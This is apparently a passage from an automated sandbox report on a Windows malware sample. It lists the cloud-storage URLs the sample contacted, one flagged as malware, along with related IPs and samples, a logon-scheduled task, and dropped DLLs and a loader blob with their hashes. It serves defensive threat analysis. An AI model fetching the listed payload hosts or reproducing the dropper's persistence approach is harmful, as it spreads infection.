              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dlleLisectAVT_2403002B_185.exe, 00000000.00000003.2453413483.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2387772212.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2421004980.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijiLisectAVT_2403002B_185.exe, 00000000.00000003.2421004980.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://github.com/Pester/PesterLisectAVT_2403002B_185.exe, 00000000.00000002.2623074573.0000000003A11000.00000004.00000800.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              http://crl.microLisectAVT_2403002B_185.exe, 00000000.00000002.2627778324.0000000006D4C000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2551591777.0000000006D4C000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2552579751.0000000006D4C000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2540678118.0000000006D49000.00000004.00000020.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              http://schemas.xmlsoap.org/wsdl/LisectAVT_2403002B_185.exe, 00000000.00000002.2623074573.0000000003A11000.00000004.00000800.00020000.00000000.sdmpfalse
              • URL Reputation: safe
              unknown
              https://leisuretrade-1323571269.cos.ap-beijing.myqcloud.com/TiwLisectAVT_2403002B_185.exe, 00000000.00000002.2620844135.0000000000CAF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/200023LisectAVT_2403002B_185.exe, 00000000.00000003.2387772212.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp120.dllOLisectAVT_2403002B_185.exe, 00000000.00000003.2421071524.0000000000D0C000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2453413483.0000000000CDF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2421004980.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/msvcp140.dlldllLisectAVT_2403002B_185.exe, 00000000.00000003.2387772212.0000000000CDF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://kdll-1323571269.cos.ap-beijing.myqcloud.com/vcruntime140.dllnW9wLisectAVT_2403002B_185.exe, 00000000.00000002.2620844135.0000000000CAF000.00000004.00000020.00020000.00000000.sdmp, LisectAVT_2403002B_185.exe, 00000000.00000003.2387902133.0000000000CAF000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              • No. of IPs < 25%
              • 25% < No. of IPs < 50%
              • 50% < No. of IPs < 75%
              • 75% < No. of IPs
              IPDomainCountryFlagASNASN NameMalicious
              43.153.232.152
              sgp.file.myqcloud.comJapan4249LILLY-ASUSfalse
              82.156.94.48
              bj.file.myqcloud.comChina
              12513ECLIPSEGBfalse
              82.156.94.47
              unknownChina
              12513ECLIPSEGBfalse
              Joe Sandbox version:40.0.0 Tourmaline
              Analysis ID:1482004
              Start date and time:2024-07-25 17:08:29 +02:00
              Joe Sandbox product:CloudBasic
              Overall analysis duration:0h 6m 49s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
              Run name:Run with higher sleep bypass
              Number of analysed new started processes analysed:7
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample name:LisectAVT_2403002B_185.exe
              Detection:MAL
              Classification:mal88.evad.winEXE@5/19@3/3
              EGA Information:
              • Successful, ratio: 100%
              HCA Information:
              • Successful, ratio: 100%
              • Number of executed functions: 97
              • Number of non-executed functions: 61
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, slscr.update.microsoft.com, fe3cr.delivery.mp.microsoft.com
              • Not all processes where analyzed, report is missing behavior information
              • Report size getting too big, too many NtCreateKey calls found.
              • Report size getting too big, too many NtOpenKeyEx calls found.
              • Report size getting too big, too many NtProtectVirtualMemory calls found.
              • Report size getting too big, too many NtQueryValueKey calls found.
              • Report size getting too big, too many NtReadVirtualMemory calls found.
              • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
              • VT rate limit hit for: LisectAVT_2403002B_185.exe
              TimeTypeDescription
              17:10:12Task SchedulerRun new task: OnLogon path: C:\Program Files (x86)\Everything\Everything.exe s>1
              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
              43.153.232.152LisectAVT_2403002B_295.exeGet hashmaliciousUnknownBrowse
                LisectAVT_2403002B_321.exeGet hashmaliciousUnknownBrowse
                  LisectAVT_2403002C_57.exeGet hashmaliciousUnknownBrowse
                    https://v02i29jwyl-1324277188.cos.ap-singapore.myqcloud.com/v02i29jwyl.htmlGet hashmaliciousHTMLPhisherBrowse
                      https://docs.google.com/presentation/d/e/2PACX-1vRLd0kcVFz9h2YfkJ5nqT-SOn8rPnsID4V6KoblagKxsqmWxdzqw58DZbzyFQwP58roXNGiXOHm3hC-/pub?start=false&loop=false&delayms=3000Get hashmaliciousHTMLPhisherBrowse
                        https://thepiecehall-my.sharepoint.com/:o:/g/personal/alice_bailey_thepiecehall_co_uk/EjWZnrwvL_NEvRNFzjIEyrkBCjxZm3JFiqR9uLcShv_eEQ?e=5%3aJfKzbl&fromShare=true&at=9Get hashmaliciousHTMLPhisherBrowse
                          https://thepiecehall-my.sharepoint.com:443/:o:/g/personal/alice_bailey_thepiecehall_co_uk/EjWZnrwvL_NEvRNFzjIEyrkBCjxZm3JFiqR9uLcShv_eEQ?e=5%3aJfKzbl&fromShare=true&at=9Get hashmaliciousHTMLPhisherBrowse
                            https://indd.adobe.com/view/801f03d9-90b1-4835-a925-9e392cc9953aGet hashmaliciousHTMLPhisherBrowse
                              https://attachmentpresentation.w3spaces.com/Get hashmaliciousHTMLPhisherBrowse
                                82.156.94.48New_Text_Document_mod.exse.exeGet hashmaliciousAgentTesla, Amadey, Creal Stealer, Djvu, FormBook, Glupteba, GuLoaderBrowse
                                  word.exeGet hashmaliciousUnknownBrowse
                                    82.156.94.474a9OE5cKJo.exeGet hashmaliciousUnknownBrowse
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      bj.file.myqcloud.comLisectAVT_2403002A_276.exeGet hashmaliciousUnknownBrowse
                                      • 82.156.94.45
                                      https://appservies02342-1321331581.cos.ap-beijing.myqcloud.com/cummon/update-agreements/claimGet hashmaliciousHTMLPhisherBrowse
                                      • 82.156.94.13
                                      setup#U67e5#U8be2_pf2024.exeGet hashmaliciousGhostRat, NitolBrowse
                                      • 82.156.94.17
                                      https://appservies02342-1321331581.cos.ap-beijing.myqcloud.com/cummon/update-agreements/claimGet hashmaliciousHTMLPhisherBrowse
                                      • 82.156.94.13
                                      New_Text_Document_mod.exse.exeGet hashmaliciousAgentTesla, Amadey, Creal Stealer, Djvu, FormBook, Glupteba, GuLoaderBrowse
                                      • 82.156.94.48
                                      4a9OE5cKJo.exeGet hashmaliciousUnknownBrowse
                                      • 82.156.94.45
                                      4a9OE5cKJo.exeGet hashmaliciousUnknownBrowse
                                      • 82.156.94.47
                                      1q3HnZAcnJ.exeGet hashmaliciousUnknownBrowse
                                      • 82.156.94.45
                                      word.exeGet hashmaliciousUnknownBrowse
                                      • 82.156.94.48
                                      sgp.file.myqcloud.comLisectAVT_2403002B_246.exeGet hashmaliciousUnknownBrowse
                                      • 43.152.64.207
                                      LisectAVT_2403002B_246.exeGet hashmaliciousUnknownBrowse
                                      • 43.153.232.151
                                      LisectAVT_2403002B_295.exeGet hashmaliciousUnknownBrowse
                                      • 43.152.64.207
                                      LisectAVT_2403002B_295.exeGet hashmaliciousUnknownBrowse
                                      • 43.152.64.193
                                      LisectAVT_2403002B_321.exeGet hashmaliciousUnknownBrowse
                                      • 43.152.64.207
                                      LisectAVT_2403002B_321.exeGet hashmaliciousUnknownBrowse
                                      • 43.153.232.152
                                      LisectAVT_2403002B_78.exeGet hashmaliciousUnknownBrowse
                                      • 43.152.64.193
                                      LisectAVT_2403002B_78.exeGet hashmaliciousUnknownBrowse
                                      • 43.152.64.207
                                      LisectAVT_2403002C_57.exeGet hashmaliciousUnknownBrowse
                                      • 43.152.64.193
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      ECLIPSEGBLisectAVT_2403002A_276.exeGet hashmaliciousUnknownBrowse
                                      • 82.156.94.45
                                      0GJSC4Ua2K.elfGet hashmaliciousUnknownBrowse
                                      • 91.84.192.7
                                      KBNCt45Gpk.elfGet hashmaliciousMiraiBrowse
                                      • 212.108.82.87
                                      PO-9412-23007-EPCM_CONSUMABLE_PT.exeGet hashmaliciousFormBookBrowse
                                      • 109.176.207.133
                                      INV90097.exeGet hashmaliciousFormBookBrowse
                                      • 109.176.207.133
                                      SecuriteInfo.com.Win32.RATX-gen.28387.25625.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                      • 109.176.30.246
                                      j4w59eO0yw.exeGet hashmaliciousReverse SSHBrowse
                                      • 82.157.80.216
                                      ztGOiA742S.elfGet hashmaliciousUnknownBrowse
                                      • 109.176.92.189
                                      mfQABKHhh1.elfGet hashmaliciousMiraiBrowse
                                      • 82.152.77.19
                                      LILLY-ASUSLisectAVT_2403002B_202.exeGet hashmaliciousUnknownBrowse
                                      • 43.152.28.43
                                      LisectAVT_2403002B_202.exeGet hashmaliciousUnknownBrowse
                                      • 43.129.31.231
                                      LisectAVT_2403002B_225.exeGet hashmaliciousUnknownBrowse
                                      • 43.129.30.209
                                      LisectAVT_2403002B_246.exeGet hashmaliciousUnknownBrowse
                                      • 43.152.64.207
                                      LisectAVT_2403002B_246.exeGet hashmaliciousUnknownBrowse
                                      • 43.152.64.207
                                      LisectAVT_2403002B_295.exeGet hashmaliciousUnknownBrowse
                                      • 43.152.64.207
                                      LisectAVT_2403002B_295.exeGet hashmaliciousUnknownBrowse
                                      • 43.152.64.193
                                      LisectAVT_2403002B_321.exeGet hashmaliciousUnknownBrowse
                                      • 43.152.64.207
                                      LisectAVT_2403002B_321.exeGet hashmaliciousUnknownBrowse
                                      • 43.153.232.152
                                      ECLIPSEGBLisectAVT_2403002A_276.exeGet hashmaliciousUnknownBrowse
                                      • 82.156.94.45
                                      0GJSC4Ua2K.elfGet hashmaliciousUnknownBrowse
                                      • 91.84.192.7
                                      KBNCt45Gpk.elfGet hashmaliciousMiraiBrowse
                                      • 212.108.82.87
                                      PO-9412-23007-EPCM_CONSUMABLE_PT.exeGet hashmaliciousFormBookBrowse
                                      • 109.176.207.133
                                      INV90097.exeGet hashmaliciousFormBookBrowse
                                      • 109.176.207.133
                                      SecuriteInfo.com.Win32.RATX-gen.28387.25625.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                      • 109.176.30.246
                                      j4w59eO0yw.exeGet hashmaliciousReverse SSHBrowse
                                      • 82.157.80.216
                                      ztGOiA742S.elfGet hashmaliciousUnknownBrowse
                                      • 109.176.92.189
                                      mfQABKHhh1.elfGet hashmaliciousMiraiBrowse
                                      • 82.152.77.19
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      37f463bf4616ecd445d4a1937da06e19LisectAVT_2403002B_198.exeGet hashmaliciousXRedBrowse
                                      • 43.153.232.152
                                      • 82.156.94.48
                                      • 82.156.94.47
                                      67#U2464.htaGet hashmaliciousUnknownBrowse
                                      • 43.153.232.152
                                      • 82.156.94.48
                                      • 82.156.94.47
                                      LisectAVT_2403002B_246.exeGet hashmaliciousUnknownBrowse
                                      • 43.153.232.152
                                      • 82.156.94.48
                                      • 82.156.94.47
                                      fuol91mv.exeGet hashmaliciousUnknownBrowse
                                      • 43.153.232.152
                                      • 82.156.94.48
                                      • 82.156.94.47
                                      LisectAVT_2403002B_245.exeGet hashmaliciousUnknownBrowse
                                      • 43.153.232.152
                                      • 82.156.94.48
                                      • 82.156.94.47
                                      fuol91mv.exeGet hashmaliciousUnknownBrowse
                                      • 43.153.232.152
                                      • 82.156.94.48
                                      • 82.156.94.47
                                      LisectAVT_2403002B_246.exeGet hashmaliciousUnknownBrowse
                                      • 43.153.232.152
                                      • 82.156.94.48
                                      • 82.156.94.47
                                      IMG88957937579577593957937593756295Jimpy.exeGet hashmaliciousGuLoaderBrowse
                                      • 43.153.232.152
                                      • 82.156.94.48
                                      • 82.156.94.47
                                      LisectAVT_2403002B_286.exeGet hashmaliciousUnknownBrowse
                                      • 43.153.232.152
                                      • 82.156.94.48
                                      • 82.156.94.47
                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      C:\Program Files (x86)\Everything\msvcp120.dllSecuriteInfo.com.Win32.Malware.Dropper.Heur.12585.3788.exeGet hashmaliciousUnknownBrowse
                                        N-9hndmrcq j9uj93.msiGet hashmaliciousUnknownBrowse
                                          C:\Program Files (x86)\Everything\msvcp140.dllLisectAVT_2403002B_246.exeGet hashmaliciousUnknownBrowse
                                            LisectAVT_2403002B_246.exeGet hashmaliciousUnknownBrowse
                                              LisectAVT_2403002B_295.exeGet hashmaliciousUnknownBrowse
                                                LisectAVT_2403002B_295.exeGet hashmaliciousUnknownBrowse
                                                  LisectAVT_2403002B_78.exeGet hashmaliciousUnknownBrowse
                                                    LisectAVT_2403002B_78.exeGet hashmaliciousUnknownBrowse
                                                      2024po.exeGet hashmaliciousGhostRatBrowse
                                                        2024po.exeGet hashmaliciousGhostRatBrowse
                                                          psqlodbc-setup.exeGet hashmaliciousPrivateLoaderBrowse
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):40917
                                                            Entropy (8bit):7.28053200206121
                                                            Encrypted:false
                                                            SSDEEP:768:3SR/d8civCTlNQHE64vMXuyMcS7iKGztVuanh8w2OfJ7ejaP6yEqzeGO0gf:Q/dSCoHE6wE7McS7i9u6yeNejY6yFOB
                                                            MD5:8AA72F47438EEBD6FE0E8C94BD206CA8
                                                            SHA1:6B9AD499F5C9E71294E3086A8C6E56F3B5C4590F
                                                            SHA-256:E45B9DFCCD0EEE7F4D676E2AAA74D8FE0238A3B37E2B21A9182C283B70D6A2FD
                                                            SHA-512:A5315D541B118D72997204FA983EBB0046F8B8D09EABEDFC1C1BCC55200B5191611697F2B9BE9B065656FDBC7BE6CE2BC0328BD03BDCD45A7A11384D1B199400
                                                            Malicious:false
                                                            Yara Hits:
                                                            • Rule: Windows_Trojan_Donutloader_f40e3759, Description: unknown, Source: C:\Program Files (x86)\Everything\4.bin, Author: unknown
                                                            Reputation:low
                                                            Preview:..=...=..`9j.k...5pD?.Q....".f 7.h.........}]'..4.NV.h3.t>.Qro.......B.'".i...x.8..RX.K7...f.m4...+.9W!.F.....6...f..l6...Q.fQ..=.F%y..=..H..c.}..x}.....:.E"."....h........~(.k...>B..ns.D.......C.....q...>+CQ0....V.s.....u.}..&I.*8_.!.>..=(.;.....S.*........U....._SO...||_..I..X..R..bD...[..Sz.7...F..u_.....Q.....@...(.-G......}...E...m.l....EL.....)WI.....I/=u3N^WY...#.YH...\j.5{.s.9z7=A..A.Y;...5Yq,.ND\#.M..L....j...O..@-z..n..b._.........u.....ns.KL.h<._..x...D.,....6....}..P.5.-u.u&B#.. .G.|_....]T....}......g....Xl<.J...R~|.m......................N.z..x.+.-}.[;...L;.....].2..*.....4..0...(../.b.C...M=....b{t7........Wp..E...J.~.K...8....g.:[]..{4......V.F.....*y^...M.SI.....i..w..4.<*.Z..$:t8.DJj.+........P.*...w.^@#....X.P.*....H...]...~I.5F...=dA....~kU.Y.X.V+.......m*.)7*.......]i...G.f....=...`......=........R.x.-`.Mbe...M..J..#..Y......Q../H....5...!`.....p?b.... B..../|...fL..q.....V.t....u..P...{...;.&u.p.;..._..1.......T..ru..U.
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:XML 1.0 document, ASCII text
                                                            Category:dropped
                                                            Size (bytes):423
                                                            Entropy (8bit):5.620481328829655
                                                            Encrypted:false
                                                            SSDEEP:12:TM3iu5veHcwUUDmQ78EdJNLUeb/XOaGUPUG/JqO11Xbv:qV5jwNAERUeb/++Uu1BL
                                                            MD5:561717380FDFAE01A131820560486692
                                                            SHA1:8B8EE9B7AD1649145E736B9F4EED51C05AB0270A
                                                            SHA-256:09A9951F431128FECD536D9A0C693133FD9B535529E6E660C331CA0FB073464F
                                                            SHA-512:0F5130DF82C45D9C1D84A4605A56E8EE2792E3091F85F560919FEE4832980242AC71E6F30EB42EBA26B51E31D5022BE8D328723077F0E3030BB829ADC3A54C29
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:<?xml version='1.0' encoding='utf-8' ?>.<Error>..<Code>NoSuchKey</Code>..<Message>The specified key does not exist.</Message>..<Resource>/1.exe</Resource>..<RequestId>NjZhMjZhYTZfOWFhYzViNjRfMjJkM18yMDBmNGZj</RequestId>..<TraceId>OGVmYzZiMmQzYjA2OWNhODk0NTRkMTBiOWVmMDAxODc0OWRkZjk0ZDM1NmI1M2E2MTRlY2MzZDhmNmI5MWI1OTVlYmNhYjQwZWZiOTI4YWY0MTRiOWU0YzQ3ZmVhMjQ3MzA1MGE0MTEyY2JkYThjZGM1ZTg3MTIxMTlhMjg0M2Y=</TraceId>.</Error>..
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):455160
                                                            Entropy (8bit):6.695463462044302
                                                            Encrypted:false
                                                            SSDEEP:12288:aZ/8wcqw2oe+Z3VrfwfNOOoWhUgiW6QR7t5ss3Ooc8DHkC2e77m:a/8wVwHZFTwFOOos3Ooc8DHkC2e77m
                                                            MD5:50260B0F19AAA7E37C4082FECEF8FF41
                                                            SHA1:CE672489B29BAA7119881497ED5044B21AD8FE30
                                                            SHA-256:891603D569FC6F1AFED7C7D935B0A3C7363C35A0EB4A76C9E57EF083955BC2C9
                                                            SHA-512:6F99D39BFE9D4126417FF65571C78C279D75FC9547EE767A594620C0C6F45F4BB42FD0C5173D9BC91A68A0636205A637D5D1C7847BD5F8CE57E120D210B0C57D
                                                            Malicious:false
                                                            Joe Sandbox View:
                                                            • Filename: SecuriteInfo.com.Win32.Malware.Dropper.Heur.12585.3788.exe, Detection: malicious, Browse
                                                            • Filename: N-9hndmrcq j9uj93.msi, Detection: malicious, Browse
                                                            Reputation:low
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o...+.N+.N+.N.3wN).N+.N..Nm.aN(.Nm.cN#.Nm.]N..Nm.\Ne.Nm.YN-.Nm.`N*.Nm.gN*.Nm.bN*.NRich+.N........................PE..L....|OR.........."!.........................0......................................5.....@..........................W..L...<...<........................=.......D...................................K..@...............<............................text...<........................... ..`.data....^...0...0... ..............@....idata...............P..............@..@.rsrc................j..............@..@.reloc...D.......F...n..............@..B........................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):446840
                                                            Entropy (8bit):6.690279428020546
                                                            Encrypted:false
                                                            SSDEEP:12288:5mtyWf0sTWRzbpT/tD5YpsGx30h7whUgiW6QR7t5s03Ooc8dHkC2es98R:A0HsTWRzbp5D5YpsM3A7v03Ooc8dHkCh
                                                            MD5:C766CA0482DFE588576074B9ED467E38
                                                            SHA1:5AC975CCCE81399218AB0DD27A3EFFC5B702005E
                                                            SHA-256:85AA8C8AB4CBF1FF9AE5C7BDE1BF6DA2E18A570E36E2D870B88536B8658C5BA8
                                                            SHA-512:EE36BC949D627B06F11725117D568F9CF1A4D345A939D9B4C46040E96C84159FA741637EF3D73ED2D01DF988DE59A573C3574308731402EB52BAE2329D7BDDAC
                                                            Malicious:false
                                                            Joe Sandbox View:
                                                            • Filename: LisectAVT_2403002B_246.exe, Detection: malicious, Browse
                                                            • Filename: LisectAVT_2403002B_246.exe, Detection: malicious, Browse
                                                            • Filename: LisectAVT_2403002B_295.exe, Detection: malicious, Browse
                                                            • Filename: LisectAVT_2403002B_295.exe, Detection: malicious, Browse
                                                            • Filename: LisectAVT_2403002B_78.exe, Detection: malicious, Browse
                                                            • Filename: LisectAVT_2403002B_78.exe, Detection: malicious, Browse
                                                            • Filename: 2024po.exe, Detection: malicious, Browse
                                                            • Filename: 2024po.exe, Detection: malicious, Browse
                                                            • Filename: psqlodbc-setup.exe, Detection: malicious, Browse
                                                            Reputation:moderate, very likely benign file
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........O.$...w...w...w.\.v...w.V@w...w..v...w...w...w..v...w..v...w..vD..w..v...w.,w...w..v...wRich...w........................PE..L....4.w.........."!...&.....z...............0.......................................=....@A.........................S......8c..........................xO.......4...U..T...........................8U..@............`..0............................text...b........................... ..`.data....&...0......................@....idata..0....`.......0..............@..@.rsrc................H..............@..@.reloc...4.......6...L..............@..B........................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):970744
                                                            Entropy (8bit):6.964896388792595
                                                            Encrypted:false
                                                            SSDEEP:12288:6BmFyjLAOQaYkxGXPfY7eiWWcpOKnpTVOIxhK765qlRRb6x4pI23IbJSH:SmFyjLF847eiWWcoGZVOIxh/WxIAIbu
                                                            MD5:50097EC217CE0EBB9B4CAA09CD2CD73A
                                                            SHA1:8CD3018C4170072464FBCD7CBA563DF1FC2B884C
                                                            SHA-256:2A2FF2C61977079205C503E0BCFB96BF7AA4D5C9A0D1B1B62D3A49A9AA988112
                                                            SHA-512:AC2D02E9BFC2BE4C3CB1C2FFF41A2DAFCB7CE1123998BBF3EB5B4DC6410C308F506451DE9564F7F28EB684D8119FB6AFE459AB87237DF7956F4256892BBAB058
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S9...XlA.XlA.XlA..A.XlA.XmA.XlAQ..A.ZlAQ..AvXlAQ..A!XlAQ..A.XlAQ..A.XlAQ..A.XlAQ..A.XlARich.XlA........PE..L....|OR.........."!................D.....................................................@.........................`........R..(....p...................=......d]..@...8...........................H...@............P...............................text............................... ..`.data...4e.......V..................@....idata.......P......................@....rsrc........p.......0..............@..@.reloc..d].......^...4..............@..B................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):91104
                                                            Entropy (8bit):6.919609919273454
                                                            Encrypted:false
                                                            SSDEEP:1536:wd5wd+ywOpmlhcsrG4ckZEzH3qDLItnTwfVkC2KecbGJ13yd+zTNFZFzK:wdJywOpmlPrHI6D+nTwvlecbG/3y8XG
                                                            MD5:9C133B18FA9ED96E1AEB2DA66E4A4F2B
                                                            SHA1:238D34DBD80501B580587E330D4405505D5E80F2
                                                            SHA-256:C7D9DFDDBE68CF7C6F0B595690E31A26DF4780F465D2B90B5F400F2D8D788512
                                                            SHA-512:D2D588F9940E7E623022ADEBEBDC5AF68421A8C1024177189D11DF45481D7BFED16400958E67454C84BA97F0020DA559A8DAE2EC41950DC07E629B0FD4752E2F
                                                            Malicious:false
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................2........I..............o.......o.......o.......o.......o%......o......Rich............PE..L....s............"!...&............P........................................P...........@A........................@........ .......0...................O...@.......$..T............................#..@............ ...............................text...T........................... ..`.data...d...........................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):219584
                                                            Entropy (8bit):6.1663383385555814
                                                            Encrypted:false
                                                            SSDEEP:3072:0Kip9MQPBN+xPYpaEjlFORHc+hmTb2vNESkT6rQxCqCp4fCw4mCD4pbu:0D5N+6fjlURHcTbMNSTbxupfwADL
                                                            MD5:E864FE41A4FEDEC386A65CB456CA3066
                                                            SHA1:3BEE65E903573E7CDB0592F3519F98BDCDE493C3
                                                            SHA-256:06871B2A233E56C57741FD40EC1D298D306C60FCBF5236832C4CE98FF34D8DCA
                                                            SHA-512:4E8C0EB8F2642BA210C53C5CF4379D2F89A1130B148C934B79ACD32B2B77257A18C24173AEF36877C64C46E709EB4A622CF69A352DCEBE97ACCB432F5D886317
                                                            Malicious:false
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........L...L...L...E...F....$..\....$..F....$..N....$..H......I...L...*....'..M....'..M....'b.M....'..M...RichL...........PE..L...>..e...........!...'............3........................................p............@.........................P.......l........................0...).......a.....................................@............................................text............................... ..`.rdata...2.......4..................@..@.data...............................@....rsrc...............................@..@.reloc...a.......b..................@..B................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:modified
                                                            Size (bytes):4077
                                                            Entropy (8bit):5.351303423945478
                                                            Encrypted:false
                                                            SSDEEP:96:iqlYqh3oEFxtIIVMcCgAhMFKrJcqFfr0U1tI6eqzNqMRniAqU57UMq4hS:iqlYqh37IIVMvJcq5dtI6eqzNqM51qUA
                                                            MD5:BDC14B6EA42EEA6E0D8B536DBC9DCDB0
                                                            SHA1:EEEDB8B60B2FC49C9D12D1FD267146AFF55E6ECC
                                                            SHA-256:CDE89D8254F2C6AF2FC1F4F12A8CB77401543F5BE05EE6080518F47DF73FA014
                                                            SHA-512:0CDCDE0E18F1C36DA7525FA8FE463720103245E97194D9C86E515F7374C425228DBFCFF22148AC46AD50BFABE2CB0FCC6B90118833777D35CA6F183C09B7F68F
                                                            Malicious:true
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Management.Automation, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#\7ae6ae69c7471e5e034a046629402c6a\System.Management.Automation.ni.dll",0..3,"Microsoft.PowerShell.Commands.Diagnostics, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe#\5484a7638cf633fd03f0dcd66df5a16d\Microsoft.PowerShell.Commands.Diagnostics.ni.dll",0..3,"System.Configuration.Install, Version=4.0.0.0, Culture=neutral
                                                            Process:C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):446840
                                                            Entropy (8bit):6.690279428020546
                                                            Encrypted:false
                                                            SSDEEP:12288:5mtyWf0sTWRzbpT/tD5YpsGx30h7whUgiW6QR7t5s03Ooc8dHkC2es98R:A0HsTWRzbp5D5YpsM3A7v03Ooc8dHkCh
                                                            MD5:C766CA0482DFE588576074B9ED467E38
                                                            SHA1:5AC975CCCE81399218AB0DD27A3EFFC5B702005E
                                                            SHA-256:85AA8C8AB4CBF1FF9AE5C7BDE1BF6DA2E18A570E36E2D870B88536B8658C5BA8
                                                            SHA-512:EE36BC949D627B06F11725117D568F9CF1A4D345A939D9B4C46040E96C84159FA741637EF3D73ED2D01DF988DE59A573C3574308731402EB52BAE2329D7BDDAC
                                                            Malicious:false
